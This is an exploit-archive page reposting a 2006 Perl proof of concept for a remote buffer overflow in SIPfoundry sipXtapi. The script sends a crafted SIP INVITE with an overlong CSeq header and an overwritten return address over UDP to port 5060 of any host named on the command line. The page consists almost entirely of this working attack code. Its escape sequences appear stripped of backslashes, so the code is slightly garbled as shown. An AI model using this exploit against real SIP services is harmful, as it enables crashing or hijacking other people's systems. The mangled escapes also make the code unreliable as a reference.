SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC
# Published : 2006-07-10
# Author : Michael Thumann
# Previous Title : Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC
# Next Title : MS Internet Explorer 6 Table.Frameset NULL Dereference Vulnerability

#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann nn";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="x41x41x41x41";
my $cseq =
"x31x31x35x37x39x32x30x38".
"x39x32x33x37x33x31x36x31".
"x39x35x34x32x33x35x37x30".
$eip;
my $packet =<<END;
INVITE sip:user@$source SIP/2.0r
To: <sip:$target:$target_port>r
Via: SIP/2.0/UDP $target:3277r
From: "moz"<sip:$target:3277>r
Call-ID: 3121$targetr
CSeq: $cseqr
Max-Forwards: 70r
Contact: <sip:$source:5059>r
r
END

print "Sending Packet to: " . $target . "nn";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!n";
print "Done.n";

#EoF

# www.Syue.com [2006-07-10]